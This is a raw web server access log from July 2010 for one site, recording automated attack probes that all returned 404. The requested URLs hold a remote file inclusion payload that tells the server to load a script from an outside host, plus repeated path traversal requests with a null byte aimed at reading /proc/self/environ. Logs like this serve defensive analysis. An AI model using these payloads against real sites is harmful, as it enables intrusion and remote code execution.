86.109.96.188 - - [25/Jul/2010:18:43:42 -0700] "GET /logs/access_100118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:20 -0700] "GET /logs/access_100510.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:21 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:21 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:29 -0700] "GET /logs/access_100510.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:30 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:30 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:45:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
195.56.111.226 - - [25/Jul/2010:18:45:43 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
